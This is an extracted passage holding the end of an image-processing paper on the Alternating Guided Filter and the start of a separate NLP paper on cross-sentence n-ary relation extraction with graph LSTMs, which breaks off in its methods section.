Kropatsch, 2015; Zhang et al., 2014). Note that in practical applications, filtering should preferably be performed in the CIE-Lab color space, so that only perceptually similar colors are averaged and only perceptually significant edges are preserved. As noted before, a bilateral filter (see Eq. (1)) is controlled by two parameters: the size of the spatial filter kernel (σspatial) and that of the range filter kernel (σrange). Except when stated otherwise, we used the same constant values for the spatial and range kernels in the bilateral filters that are included in all three frameworks investigated in this study (i.e., RGF, SiRmed and AGF): σspatial=5 and σrange=0.05. These values were empirically Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 8/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72/supplemental-information http://dx.doi.org/10.7717/peerj-cs.72/supplemental-information http://dx.doi.org/10.7717/peerj-cs.72/supplemental-information http://dx.doi.org/10.7717/peerj-cs.72 Figure 1 Effects of SiR and SiRmed filtering on image intensity. (A) Input image (Photo credit: Adrian Mendoza). (B, C) 1D Image intensity distribution along a horizontal cross section of (A) (yellow line) after the first 3 iterations of respectively SiR and SiRmed. The lowest curves show the original intensity distribution in (A). (D, E) Results after 5 iterations of respectively SiR and SiRmed. The spatial and range kernels used in the bilateral filters for this example were respectively σspatial =5 and σrange =0.05. determined and resulted in an effective performance for all three frameworks on the entire set of selected test images. Relative performance of SiR and SiRmed Figures 1 and 2 illustrate the effect of including a median filter with a kernel size of 3 × 3 at the end of each iteration step in the SiR framework (see Table 2). Figure 1 shows the original input image (a) with the result of respectively SiR (Fig. 1D) and SiRmed (Fig. 1E) Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 9/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Figure 2 Effects of SiR and SiRmed filtering on image intensity. (A) Input image. (B, C) 1D Image in- tensity distribution along a horizontal cross section of (A) (yellow line) after the first 3 iterations of re- spectively SiR and SiRmed. The lowest curves show the original intensity distribution in (A). (D, E) Re- sults after 5 iterations of respectively SiR and SiRmed. The spatial and range kernels used in the bilateral filters for this example were respectively σspatial =5 and σrange =0.05. after 5 iterations. In addition, this figure also shows the 1D image intensity distribution along a horizontal cross section of the input image (yellow line in Fig. 1A) after each of the first 3 iterations of both SiR (Fig. 1C) and SiRmed (Fig. 1D). The lowest curves represent the original intensity distribution (Fig. 1A). Comparison of Figs. 1D and 1E shows that SiRmed effectively removes small details all over the image, while SiR reintroduces small details near large scale edges (notice for instance the light poles all over the stadium, that are restored in Fig. 1D but are nicely removed in Fig. 1E). A comparison of Figs. 1B and 1C Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 10/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Figure 3 Results of RGF, SiRmed and AGF filtering for the first 3 iteration steps. The spatial and range kernels used in the bilateral filters for this example were respectively σspatial = 5 and σrange = 0.05. left. (Photo credit: Adrian Mendoza). shows that SiR indeed restores high frequency details near large edge discontinuities, while SiRmed restores these large scale edges without the reintroduction of small scale details. This effect is also clearly demonstrated in Fig. 2, where SiR fails to remove the small scale details all around the outlines of the tentacles and the fishes, while SiRmed effectively filters small elements all around these larger objects while both preserving their outlines and smoothing their interior. Relative performance of RGF, SiRmed and AGF Figure 3 shows the results of RGF, SiRmed and AGF filtering after the first 3 iteration steps. Notice that all three filter schemes iteratively restore large scale image edges proceeding from an initial low resolution version of the input image. In this process RGF gradually smoothes the curvature of the large scale edges, while SiRmed smoothes the overall image intensity resulting in a global contrast reduction. In contrast, AGF restores the large scale edges without smoothing their curvature and with preservation of local image contrast. Figures 4B–4D illustrate these effects by showing 1D horizontal cross sections. The contrast reducing effect of SiR is clearly shown in Fig. 4C as an overall reduction of the height of the large scale peaks. Comparison of Figs. 4E and 4G illustrates that RGF smoothes the curvature of large scale edges while AGF preserves edge curvature. Figure 5 shows the details that are removed by filtering with respectively RGF (Fig. 5B), SiRmed (Fig. 5C) and AGF (Fig. 5D) after 5 iterations, together with the original input image (Fig. 5A). These images are obtained by subtracting the original image from the filtered ones and computing the mean of the absolute value across the three color channels. This example illustrates that each of the three filters removes small scale details while preserving the larger scale edges to a certain extent. Note that AGF removes small image Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 11/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Figure 4 Comparison of RGF, SiRmed and AGF filtering. (A) Input image (Photo credit: Adrian Men- doza). (B–D) 1D Image intensity distribution along a horizontal cross section (yellow line in (A)) after 3 successive iterations. (E–G) Results after 5 iteration steps. The spatial and range kernels used in the bilat- eral filters for this example were respectively σspatial =5 and σrange =0.05. details all over the image support, while the original large scale edges (e.g., the outlines of the temple) remain relatively unaffected. In contrast, both RGF and SiRmed significantly alter the articulation of the original large scale edges. RGF smoothes the local edge curvature while SiRmed affects the local mean image intensity (resulting in local contrast reduction). As a result, large scale image contours (e.g., the outlines of the temple) are clearly visible in Figs. 5B and 5C, and much less pronounced in Fig. 5D. Figure 6 further illustrates the differential performance of all four filters investigated here (AGF, RGF, SiR, and SiRmed) on an artificial image with noise. Figure 6A shows some simple geometric shapes (cross, triangle, square and wheel) with different sizes on a step-edge background with 30% additional Gaussian noise. Figures 6B–6E show the results of respectively AGF, RGF, SiR and SiRmed filtering of Fig. 6A after five iteration steps. This example shows that SiR restores noise near the edges of larger details and along the vertical step edge in the background, while AGF, RGF and SiRmed effectively reduce noise all over the image plane. Also, RGF (Fig. 6C) smoothes edge curvature, in contrast to AGF, SiR and SiRmed which retain the original edge curvature. This can for instance be seen in Fig. 6C where the sharp edges of the crosses, the corners of the triangles and squares, and the spokes of the wheels are all rounded after filtering. This example also illustrates that both SiR (Fig. 6D) and SiRmed (Fig. 6E) effectively reduce image contrast due to the Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 12/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Figure 5 The elimination of small scale details by RGF, SiRmed and AGF filtering. Absolute difference between input image (A) and the results of respectively RGF (B), SiRmed (C) and AGF (D) after 5 itera- tions. The images have been enhanced for visual display. The spatial and range kernels used in the bilateral filters for this example were respectively σspatial =5 and σrange =0.05. intensity smoothing that is inherent in this method. AGF does not introduce any halos. In contrast, RGF produces high intensity halos, and SiR and SiRmed both produce halos with a large spatial extent (see Fig. 6C near the crosses and wheels). Effects of different parameter settings The results of RGF, SiRmed and AGF for different values of the parameters σs and σr are shown in Figs. 7–9. In these figures rows correspond to different amounts of domain filtering (i.e., different values of σs) and columns to different amounts of range filtering (i.e., different values of σr). These figures show that large spatial kernels and large range kernels both result in blurred image representations. Large spatial kernels cause averaging over large image areas, while large range kernels cause averaging over a wider range of image values. In RGF (Fig. 7) the smoothing of large scale edge curvature increases with increasing σs. This effect can for instance clearly be seen in the first column of Fig. 7 (for σr =0.05) where the curves in the roof of the temple just above the pillars are still visible for σs=3, reduced for σs=6 and removed for σs=9. In SiRmed (Fig. 8) the reduction of local image contrast increases with increasing σs. This effect can for instance clearly be seen in the first column of Fig. 8 (for σr =0.05) where Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 13/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Figure 6 Comparison of AGF, RGF, SiR and SiRmed filtering. (A) Artificial input image with 30% Gaussian noise added. Results of (B) AGF, (C) RGF, (D) SiR and (E) SiRmed filtering after 5 iteration steps. The spatial and range kernels used in the bilateral filters for this example were respectively σspatial =5 and σrange =0.05. the contrast in the background vegetation around the temple is still visible for σs =3, reduced for σs=6 and almost removed for σs=9. Figure 9 shows the effects of different parameter settings on the performance of the proposed AGF framework. In contrast to RGF, AGF preserves large scale edge curvature, as can be seen in the first column of Fig. 9 (for σr =0.05). Notice that the curves in the roof of the temple just above the pillars remain unaffected, even for the largest size of the spatial kernel (σs=9). In contrast to SiRmed, AGF also preserves local image intensity (contrast). Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 14/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Figure 7 The effects of different parameter settings on RGF filtering. Results of RGF filtering of the in- put image for different values of the variances of the spatial (σs =3, 6 and 9) and range (σr =0.05, 0.1 and 0.5) filters. Figure 8 The effects of different parameter settings on SiRmed filtering. Results of SiRmed filtering of the input image for different values of the variances of the spatial (σs = 3, 6 and 9) and range (σr = 0.05, 0.1 and 0.5) filters. Runtime evaluation In this study we used a Matlab implementation of the RGF written by Zhang et al. (2014) that is freely available from the authors (at http://www.cs.cuhk.edu.hk/~leojia/projects/ rollguidance). The JBF, which is part of this code, is also used here to implement both the SiR filter (see ‘Bilateral filter’) and the AGF filter (see ‘Alternating Guided Filter’). We Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 15/18 https://peerj.com http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://dx.doi.org/10.7717/peerj-cs.72 Figure 9 The effects of different parameter settings on AGF filtering. Results of AGF filtering of the in- put image for different values of the variances of the spatial (σs =3, 6 and 9) and range (σr =0.05, 0.1 and 0.5) filters. made no effort to optimize the code of the algorithms. We conducted a runtime test on a Dell Latitude laptop with an Intel i5 2 GHz CPU and 8 GB memory. The algorithms were implemented in Matlab 2016a. Only a single thread was used without involving any SIMD instructions. For this test we used a set of 22 natural RGB images (also provided in the Supplemental Information with this paper). The spatial and range kernels used in the bilateral filters for this test were fixed at respectively σspatial=5 and σrange=0.05, and the number of iterations was set to 5. The mean runtimes for AGF, RGF, SiR and SiRmed were respectively 3.80 ± 0.27, 1.64 ± 0.12, 1.80 ± 0.14 and 2.17 ± 0.16 s. This shows that the mean runtime of AGF is about equal to the sum of the runtimes of RGF and SiRmed. This result is as expected, since the steps involved in AGF are a combination of the steps involved in both RGF and SiRmed. CONCLUSIONS In this paper we presented the new edge-preserving Alternating Guided Filter (AGF) smoothing filter that eliminates small scale image details while preserving both the articulation and curvature of large scale edges and local mean image intensity. The AGF framework integrates the recently introduced RGF and (a slightly adapted version of) SiR filters in an alternating iterative scheme. AGF combines the large scale edge and local intensity preserving image smoothing properties of the RGF with the large scale edge restoring properties of the SiR. However, it does not suffer from the drawbacks of both of its components: the curvature smoothing of large scale edges by RGF and the local intensity reduction and restoration of small scale details near large scale edges by SiR. The AGF is simple to implement and efficient. Application to a wide range of images has shown that AGF consistently produces high-quality results. Possible applications areas for AGF are for Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 16/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72/supplemental-information http://dx.doi.org/10.7717/peerj-cs.72 instance detail enhancement, denoising, edge extraction, JPEG artifact removal, multi-scale structure decomposition, saliency detection etc. (see e.g., He, Sun & Tang, 2013; Kniefacz & Kropatsch, 2015; Zhang et al., 2014). ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Air Force Office of Scientific Research, Air Force Material Command, USAF, under grant number FA9550-15-1-0433. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Air Force Office of Scientific Research, Air Force Material Command, USAF: FA9550-15- 1-0433. Competing Interests The author declares there are no competing interests. Author Contributions • Alexander Toet conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as Supplemental Dataset. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.72#supplemental-information. REFERENCES Black MJ, Sapiro G, Marimont DH, Heeger D. 1998. Robust anisotropic diffusion. IEEE Transactions on Image Processing 7(3):421–432 DOI 10.1109/83.661192. Farbman Z, Fattal R, Lischinski D, Szeliski R. 2008. Edge-preserving decompositions for multi-scale tone and detail manipulation. ACM Transactions on Graphics 27(3): Article 67 DOI 10.1145/1360612.1360666. He K, Sun J, Tang X. 2013. Guided image filtering. IEEE Transactions on Pattern Analysis and Machine Intelligence 35(6):1397–1409 DOI 10.1109/TPAMI.2012.213. Kniefacz P, Kropatsch W. 2015. Smooth and iteratively restore: a simple and fast edge-preserving smoothing model. In: Hegenbart S, Kwitt R, Uhl A, eds. Proceedings Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 17/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72/supplemental-information http://dx.doi.org/10.7717/peerj-cs.72#supplemental-information http://dx.doi.org/10.7717/peerj-cs.72#supplemental-information http://dx.doi.org/10.1109/83.661192 http://dx.doi.org/10.1145/1360612.1360666 http://dx.doi.org/10.1109/TPAMI.2012.213 http://dx.doi.org/10.7717/peerj-cs.72 of the 39th annual workshop of the Austrian association for pattern recognition (OAGM2015). 1–9. eprint arXiv:1505.06702. Paris S, Durand F. 2006. A fast approximation of the bilateral filter using a signal processing approach. In: Leonardis A, Bischof H, Pinz A, eds. Proceedings of the 9th European conference on computer vision (ECCV 2006), part IV . Berlin, Heidelberg: Springer Berlin Heidelberg, 568–580. Perona P, Malik J. 1990. Scale-space and edge detection using anisotropic diffusion. IEEE Transactions on Pattern Analysis and Machine Intelligence 12(7):629–639 DOI 10.1109/34.56205. Petschnigg G, Agrawala M, Hoppe H, Szeliski R, Cohen M, Toyama K. 2004. Digital photography with flash and no-flash image pairs. In: ACM transactions on graphics (proceedings of SIGGRAPH2004). New York: ACM Press, 664–672. Tomasi C, Manduchi R. 1998. Bilateral filtering for gray and color images. In: Proceedings of the IEEE sixth international conference on computer vision. Piscataway: IEEE, 839–846. Zhang Q, Shen X, Xu L, Jia J. 2014. Rolling guidance filter. In: Fleet D, Pajdla T, Schiele B, Tuytelaars T, eds. Computer vision—ECCV 2014: 13th European conference, part III. Cham: Springer International Publishing, 815–830. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 18/18 https://peerj.com http://dx.doi.org/10.1109/34.56205 http://dx.doi.org/10.1109/34.56205 http://dx.doi.org/10.7717/peerj-cs.72 work_46ftgva4mfasnhpfh7cdkzzequ ---- Cross-Sentence N-ary Relation Extraction with Graph LSTMs Nanyun Peng1∗ Hoifung Poon2 Chris Quirk2 Kristina Toutanova3∗ Wen-tau Yih2 1 Center for Language and Speech Processing, Computer Science Department Johns Hopkins University, Baltimore, MD, USA 2 Microsoft Research, Redmond, WA, USA 3 Google Research, Seattle, WA, USA npeng1@jhu.edu, kristout@google.com {hoifung,chrisq,scottyih}@microsoft.com Abstract Past work in relation extraction has focused on binary relations in single sentences. Re- cent NLP inroads in high-value domains have sparked interest in the more general setting of extracting n-ary relations that span mul- tiple sentences. In this paper, we explore a general relation extraction framework based on graph long short-term memory networks (graph LSTMs) that can be easily extended to cross-sentence n-ary relation extraction. The graph formulation provides a unified way of exploring different LSTM approaches and in- corporating various intra-sentential and inter- sentential dependencies, such as sequential, syntactic, and discourse relations. A robust contextual representation is learned for the en- tities, which serves as input to the relation clas- sifier. This simplifies handling of relations with arbitrary arity, and enables multi-task learning with related relations. We evaluate this frame- work in two important precision medicine set- tings, demonstrating its effectiveness with both conventional supervised learning and distant supervision. Cross-sentence extraction pro- duced larger knowledge bases. and multi-task learning significantly improved extraction ac- curacy. A thorough analysis of various LSTM approaches yielded useful insight the impact of linguistic analysis on extraction accuracy. 1 Introduction Relation extraction has made great strides in newswire and Web domains. Recently, there has ∗ This research was conducted when the authors were at Microsoft Research. been increasing interest in applying relation extrac- tion to high-value domains such as biomedicine. The advent of $1000 human genome1 heralds the dawn of precision medicine, but progress in personalized can- cer treatment has been hindered by the arduous task of interpreting genomic data using prior knowledge. For example, given a tumor sequence, a molecular tumor board needs to determine which genes and mu- tations are important, and what drugs are available to treat them. Already the research literature has a wealth of relevant knowledge, and it is growing at an astonishing rate. PubMed2, the online repository of biomedical articles, adds two new papers per minute, or one million each year. It is thus imperative to advance relation extraction for machine reading. In the vast literature on relation extraction, past work focused primarily on binary relations in single sentences, limiting the available information. Con- sider the following example: “The deletion mutation on exon-19 of EGFR gene was present in 16 patients, while the L858E point mutation on exon-21 was noted in 10. All patients were treated with gefitinib and showed a partial response.”. Collectively, the two sentences convey the fact that there is a ternary interaction between the three entities in bold, which is not expressed in either sentence alone. Namely, tumors with L858E mutation in EGFR gene can be treated with gefitinib. Extracting such knowledge clearly requires moving beyond binary relations and single sentences. N-ary relations and cross-sentence extraction have received relatively little attention in the past. Prior 1http://www.illumina.com/systems/ hiseq-x-sequencing-system.html 2https://www.ncbi.nlm.nih.gov/pubmed 101 Transactions of the Association for Computational Linguistics, vol. 5, pp. 101–115, 2017. Action Editor: Mark Johnson. Submission batch: 10/2016; Revision batch: 4/2017; Published 4/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. The deletion mutation on exon-19 of EGFR gene was present in 16 patients, while the L858E point mutation on exon-21 was noted in 10. ROOT DET NN PREP ON PREP OF NN NSUBJ COP PREP IN ADVCL NUM DET NN NN PREP ON MARK NSUBJPASS AUXPASS PREP DEP NEXTSENT All patients were treated with gefitinib and showed a partial response. DET NSUBJPASS AUXPASS PREP WITH CONJ ANDROOT DOBJ DET AMOD Figure 1: An example document graph for a pair of sentences expressing a ternary interaction (tumors with L858E mutation in EGFR gene respond to gefitinib treatment). For simplicity, we omit edges between adjacent words or representing discourse relations. work on n-ary relation extraction focused on sin- gle sentences (Palmer et al., 2005; McDonald et al., 2005) or entity-centric attributes that can be extracted largely independently (Chinchor, 1998; Surdeanu and Heng, 2014). Prior work on cross-sentence ex- traction often used coreference to gain access to ar- guments in a different sentence (Gerber and Chai, 2010; Yoshikawa et al., 2011), without truly model- ing inter-sentential relational patterns. (See Section 7 for a more detailed discussion.) A notable excep- tion is Quirk and Poon (2017), which applied distant supervision to general cross-sentence relation extrac- tion, but was limited to binary relations. In this paper, we explore a general framework for cross-sentence n-ary relation extraction, based on graph long short-term memory networks (graph LSTMs). By adopting the graph formulation, our framework subsumes prior approaches based on chain or tree LSTMs, and can incorporate a rich set of linguistic analyses to aid relation extraction. Relation classification takes as input the entity representations learned from the entire text, and can be easily ex- tended for arbitrary relation arity n. This approach also facilitates joint learning with kindred relations where the supervision signal is more abundant. We conducted extensive experiments on two im- portant domains in precision medicine. In both dis- tant supervision and supervised learning settings, graph LSTMs that encode rich linguistic knowledge outperformed other neural network variants, as well as a well-engineered feature-based classifier. Multi- task learning with sub-relations led to further im- provement. Syntactic analysis conferred a significant benefit to the performance of graph LSTMs, espe- cially when syntax accuracy was high. In the molecular tumor board domain, PubMed- scale extraction using distant supervision from a small set of known interactions produced orders of magnitude more knowledge, and cross-sentence ex- traction tripled the yield compared to single-sentence extraction. Manual evaluation verified that the accu- racy is high despite the lack of annotated examples. 2 Cross-sentence n-ary relation extraction Let e1, · · · ,em be entity mentions in text T . Rela- tion extraction can be formulated as a classification problem of determining whether a relation R holds for e1, · · · ,em in T . For example, given a cancer patient with mutation v in gene g, a molecular tumor board seeks to find if this type of cancer would re- spond to drug d. Literature with such knowledge has been growing rapidly; we can help the tumor board by checking if the Respond relation holds for the (d,g,v) triple. Traditional relation extraction methods focus on binary relations where all entities occur in the same sentence (i.e., m = 2 and T is a sentence), and cannot handle the aforementioned ternary relations. Moreover, as we focus on more complex relations and n increases, it becomes increasingly rare that the related entities will be contained entirely in a single sentence. In this paper, we generalize extraction to cross-sentence, n-ary relations, where m > 2 and T can contain multiple sentences. As will be shown in our experiments section, n-ary relations are crucial for high-value domains such as biomedicine, and expanding beyond the sentence boundary enables the extraction of more knowledge. In the standard binary-relation setting, the dom- inant approaches are generally defined in terms of the shortest dependency path between the two en- tities in question, either by deriving rich features from the path or by modeling it using deep neural 102 networks. Generalizing this paradigm to the n-ary setting is challenging, as there are ( n 2 ) paths. One apparent solution is inspired by Davidsonian seman- tics: first, identify a single trigger phrase that sig- nifies the whole relation, then reduce the n-ary re- lation to n binary relations between the trigger and an argument. However, challenges remain. It is of- ten hard to specify a single trigger, as the relation is manifested by several words, often not contigu- ous. Moreover, it is expensive and time-consuming to annotate training examples, especially if triggers are required, as is evident in prior annotation efforts such as GENIA (Kim et al., 2009). The realistic and widely adopted paradigm is to leverage indirect su- pervision, such as distant supervision (Craven and Kumlien, 1999; Mintz et al., 2009), where triggers are not available. Additionally, lexical and syntactic patterns signi- fying the relation will be sparse. To handle such sparsity, traditional feature-based approaches require extensive engineering and large data. Unfortunately, this challenge becomes much more severe in cross- sentence extraction when the text spans multiple sen- tences. To overcome these challenges, we explore a gen- eral relation extraction framework based on graph LSTMs. By learning a continuous representation for words and entities, LSTMs can handle sparsity effectively without requiring intense feature engineer- ing. The graph formulation subsumes prior LSTM approaches based on chains or trees, and can incor- porate rich linguistic analyses. This approach also opens up opportunities for joint learning with related relations. For example, the Response relation over d,g,v also implies a binary sub-relation over drug d and mutation v, with the gene underspecified. Even with distant supervision, the supervision signal for n-ary relations will likely be sparser than their binary sub-relations. Our ap- proach makes it very easy to use multi-task learning over both the n-ary relations and their sub-relations. 3 Graph LSTMs Learning a continuous representation can be effective for dealing with lexical and syntactic sparsity. For se- quential data such as text, recurrent neural networks (RNNs) are quite popular. They resemble hidden Contextual Entity Representation c w(1) …… w(n-1) w(n) … … … … Word Embeddings for Input Text ( ） concatenation Rela%on Classifier R1 …… Rk Graph LSTM … … Figure 2: A general architecture for cross-sentence n-ary relation extraction based on graph LSTMs. Markov models (HMMs), except that discrete hid- den states are replaced with continuous vectors, and emission and transition probabilities with neural net- works. Conventional RNNs with sigmoid units suffer from gradient diffusion or explosion, making train- ing very difficult (Bengio et al., 1994; Pascanu et al., 2013). Long short-term memory (LSTMs) (Hochre- iter and Schmidhuber, 1997) combats these problems by using a series of gates (input, forget and output) to avoid amplifying or suppressing gradients during backpropagation. Consequently, LSTMs are much more effective in capturing long-distance dependen- cies, and have been applied to a variety of NLP tasks. However, most approaches are based on linear chains and only explicitly model the linear context, which ignores a variety of linguistic analyses, such as syn- tactic and discourse dependencies. In this section, we propose a general framework that generalizes LSTMs to graphs. While there is some prior work on learning tree LSTMs (Tai et al., 2015; Miwa and Bansal, 2016), to the best of our knowledge, graph LSTMs have not been applied to any NLP task yet. Figure 2 shows the architecture of this approach. The input layer is the word embedding of input text. Next is the graph LSTM which learns a contextual representation for each word. For the entities in question, their contextual representations are concatenated and become the input to the relation classifiers. For a multi-word entity, we simply used the average of its word representations and leave the exploration of more sophisticated aggregation approaches to future work. The layers are trained jointly with backpropagation. This framework is 103 All patients were treated with gefitinib and showed a partial response. ◦→◦→◦→◦→◦→◦→◦→◦→◦→◦→◦ ◦←◦←◦←◦←◦←◦←◦←◦←◦←◦←◦ Figure 3: The graph LSTMs used in this paper. The document graph (top) is partitioned into two directed acyclic graphs (bottom); the graph LSTMs is constructed by a forward pass (Left to Right) followed by a backward pass (Right to Left). Note that information goes from dependency child to parent. agnostic to the choice of classifiers. Jointly designing classifiers with graph LSTMs would be interesting future work. At the core of the graph LSTM is a document graph that captures various dependencies among the input words. By choosing what dependencies to in- clude in the document graph, graph LSTMs naturally subsumes linear-chain or tree LSTMs. Compared to conventional LSTMs, the graph for- mulation presents new challenges. Due to potential cycles in the graph, a straightforward implementation of backpropagation might require many iterations to reach a fixed point. Moreover, in the presence of a po- tentially large number of edge types (adjacent-word, syntactic dependency, etc.), parametrization becomes a key problem. In the remainder of this section, we first introduce the document graph and show how to conduct back- propagation in graph LSTMs. We then discuss two strategies for parametrizing the recurrent units. Fi- nally, we show how to conduct multi-task learning with this framework. 3.1 Document Graph To model various dependencies from linguistic analy- sis at our disposal, we follow Quirk and Poon (2017) and introduce a document graph to capture intra- and inter-sentential dependencies. A document graph consists of nodes that represent words and edges that represent various dependencies such as linear context (adjacent words), syntactic dependencies, and discourse relations (Lee et al., 2013; Xue et al., 2015). Figure 1 shows the document graph for our running example; this instance suggests that tumors with L858E mutation in EGFR gene responds to the drug gefitinib. This document graph acts as the backbone upon which a graph LSTM is constructed. If it con- tains only edges between adjacent words, we recover linear-chain LSTMs. Similarly, other prior LSTM approaches can be captured in this framework by re- stricting edges to those in the shortest dependency path or the parse tree. 3.2 Backpropagation in Graph LSTMs Conventional LSTMs are essentially very deep feed- forward neural networks. For example, a left-to-right linear LSTM has one hidden vector for each word. This vector is generated by a neural network (re- current unit) that takes as input the embedding of the given word and the hidden vector of the previ- ous word. In discriminative learning, these hidden vectors then serve as input for the end classifiers, from which gradients are backpropagated through the whole network. Generalizing such a strategy to graphs with cycles typically requires unrolling recurrence for a number of steps (Scarselli et al., 2009; Li et al., 2016; Liang et al., 2016). Essentially, a copy of the graph is created for each step that serves as input for the next. The result is a feed-forward neural network through time, and backpropagation is conducted accordingly. In principle, we could adopt the same strategy. Ef- fectively, gradients are backpropagated in a manner similar to loopy belief propagation (LBP). However, this makes learning much more expensive as each up- date step requires multiple iterations of backpropaga- tion. Moreover, loopy backpropagation could suffer from the same problems encountered to in LBP, such as oscillation or failure to converge. We observe that dependencies such as coreference and discourse relations are generally sparse, so the backbone of a document graph consists of the lin- ear chain and the syntactic dependency tree. As in belief propagation, such structures can be leveraged to make backpropagation more efficient by replac- 104 ing synchronous updates, as in the unrolling strat- egy, with asynchronous updates, as in linear-chain LSTMs. This opens up opportunities for a variety of strategies in ordering backpropagation updates. In this paper, we adopt a simple strategy that per- formed quite well in preliminary experiments, and leave further exploration to future work. Specifi- cally, we partition the document graph into two di- rected acyclic graphs (DAGs). One DAG contains the left-to-right linear chain, as well as other forward- pointing dependencies. The other DAG covers the right-to-left linear chain and the backward-pointing dependencies. Figure 3 illustrates this strategy. Effec- tively, we partition the original graph into the forward pass (left-to-right), followed by the backward pass (right-to-left), and construct the LSTMs accordingly. When the document graph only contains linear chain edges, the graph LSTMs is exactly a bi-directional LSTMs (BiLSTMs). 3.3 The Basic Recurrent Propagation Unit A standard LSTM unit consists of an input vector (word embedding), a memory cell and an output vec- tor (contextual representation), as well as several gates. The input gate and output gate control the information flowing into and out of the cell, whereas the forget gate can optionally remove information from the recurrent connection to a precedent unit. In linear-chain LSTMs, each unit contains only one forget gate, as it has only one direct precedent (i.e., the adjacent-word edge pointing to the previous word). In graph LSTMs, however, a unit may have several precedents, including connections to the same word via different edges. We thus introduce a forget gate for each precedent, similar to the approach taken by Tai et al. (2015) for tree LSTMs. Encoding rich linguistic analysis introduces many distinct edge types besides word adjacency, such as syntactic dependencies, which opens up many possi- bilities for parametrization. This was not considered in prior syntax-aware LSTM approaches (Tai et al., 2015; Miwa and Bansal, 2016). In this paper, we ex- plore two schemes that introduce more fined-grained parameters based on the edge types. Full Parametrization Our first proposal simply in- troduces a different set of parameters for each edge type, with computation specified below. it = σ(Wixt + ∑ j∈P(t) U m(t,j) i hj + bi) ot = σ(Woxt + ∑ j∈P(t) Um(t,j)o hj + bo) c̃t = tanh(Wcxt + ∑ j∈P(t) Um(t,j)c hj + bc) ftj = σ(Wfxt + U m(t,j) f hj + bf) ct = it � c̃t + ∑ j∈P(t) ftj � cj ht = ot � tanh(ct) As in standard chain LSTMs, xt is the input word vector for node t, ht is the hidden state vector for node t, W ’s are the input weight matrices, and b’s are the bias vectors. σ, tanh, and � represent the sig- moid function, the hyperbolic tangent function, and the Hadamard product (pointwise multiplication), re- spectively. The main differences lie in the recurrence terms. In graph LSTMs, a unit might have multiple predecessors (P(t)), for each of which (j) there is a forget gate ftj, and a typed weight matrix Um(t,j), where m(t,j) signifies the connection type between t and j. The input and output gates (it,ot) depend on all predecessors, whereas the forget gate (ftj) only depends on the predecessor with which the gate is associated. ct and c̃t represent intermediate compu- tation results within the memory cell, which take into account the input and forget gates, and will be combined with output gate to produce the hidden representation ht. Full parameterization is straightforward, but it re- quires a large number of parameters when there are many edge types. For example, there are dozens of syntactic edge types, each corresponding to a Stan- ford dependency label. As a result, in our exper- iments we resort to using only the coarse-grained types: word adjacency, syntactic dependency, etc. Next, we will consider a more fine-grained approach by learning an edge-type embedding. Edge-Type Embedding To reduce the number of parameters and leverage potential correlation among fine-grained edge types, we learned a low- dimensional embedding of the edge types, and con- ducted an outer product of the predecessor’s hidden vector and the edge-type embedding to generate a “typed hidden representation”, which is a matrix. The new computation is as follows: 105 it = σ(Wixt + ∑ j∈P(t) Ui ×T (hj ⊗ej) + bi) ftj = σ(Wfxt + Uf ×T (hj ⊗ej) + bf) ot = σ(Woxt + ∑ j∈P(t) Uo ×T (hj ⊗ej) + bo) c̃t = tanh(Wcxt + ∑ j∈P(t) Uc ×T (hj ⊗ej) + bc) ct = it � c̃t + ∑ j∈P(t) ftj � cj ht = ot � tanh(ct) U’s are now l× l×d tensors (l is the dimension of the hidden vector and d is the dimension for edge- type embedding), and hj ⊗ ej is a tensor product that produces an l ×d matrix. ×T denotes a tensor dot product defined as T ×T A = ∑ d(T:,:,d ·A:,d), which produces an l-dimensional vector. The edge- type embedding ej is jointly trained with the other parameters. 3.4 Comparison with Prior LSTM Approaches The main advantages of a graph formulation are its generality and flexibility. As seen in Section 3.1, linear-chain LSTMs are a special case when the doc- ument graph is the linear chain of adjacent words. Similarly, Tree LSTMs (Tai et al., 2015) are a special case when the document graph is the parse tree. In graph LSTMs, the encoding of linguistic knowl- edge is factored from the backpropagation strategy (Section 3.2), making it much more flexible, includ- ing introducing cycles. For example, Miwa and Bansal (2016) conducted joint entity and binary re- lation extraction by stacking a LSTM for relation extraction on top of another LSTM for entity recog- nition. In graph LSTMs, the two can be combined seamlessly using a document graph comprising both the word-adjacency chain and the dependency path between the two entities. The document graph can also incorporate other linguistic information. For example, coreference and discourse parsing are intuitively relevant for cross-sentence relation extraction. Although existing systems have not yet been shown to improve cross- sentence relation extraction (Quirk and Poon, 2017), it remains an important future direction to explore incorporating such analyses, especially after adapting them to the biomedical domains (Bell et al., 2016). 3.5 Multi-task Learning with Sub-relations Multi-task learning has been shown to be beneficial in training neural networks (Caruana, 1998; Collobert and Weston, 